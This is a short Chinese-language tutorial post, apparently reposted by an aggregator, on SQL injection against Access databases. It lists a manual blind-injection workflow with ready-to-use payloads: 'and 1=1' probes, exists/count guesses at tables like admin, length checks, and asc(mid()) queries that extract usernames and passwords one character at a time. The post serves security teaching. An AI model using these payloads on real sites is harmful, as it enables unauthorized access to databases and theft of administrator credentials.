第四章SQL注入----

Posted 2021-02-28 幸运儿mnmnmn

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了第四章SQL注入----相关的知识，希望对你有一定的参考价值。

SQL注入定义：

将用户输入的内容，拼接到SQL语句中，一起提交到数据库产生SQL注入威胁。

$id= $_GET[\'id\']

$id= $_POST[\'id\']

access注入基本流程:

▪1.判断有无注入

▪2.猜解表名

▪3.猜解字段

▪4.猜解管理员ID值

▪5.猜解用户名和密码长度

▪6.猜解用户名和密码

逐字猜解法

▪1、判断有无注入点▪and 1=1 and 1=2

▪2、猜表名(一般的表的名称无非是admin adminuseruser pass password 等) ▪and (Select count(*) from 表名)<>0 ▪and exists (select * from 表名)

▪3、猜列名▪and (Select count(列名) from 表名)<>0 ▪and exists (select 列名from 表名)逐字猜解法

▪4、判断内容长度▪and (select top 1 len(user_name) from admin)=5(user_name的长度=5，正常则=5，也可以用>,<号去判断）

▪5、截取字符串并转换为ascii码进行数值比较，判断ascii码值：

▪and (select top 1 asc(mid(user_name,1,1)) from admin)=97 判断第一位（97代表‘a’的ascll值）

▪and (select top 1 asc(mid(user_name,2,1)) from admin)=97 判断第二位

数据库默认的数据库

以上是关于第四章SQL注入----的主要内容，如果未能解决你的问题，请参考以下文章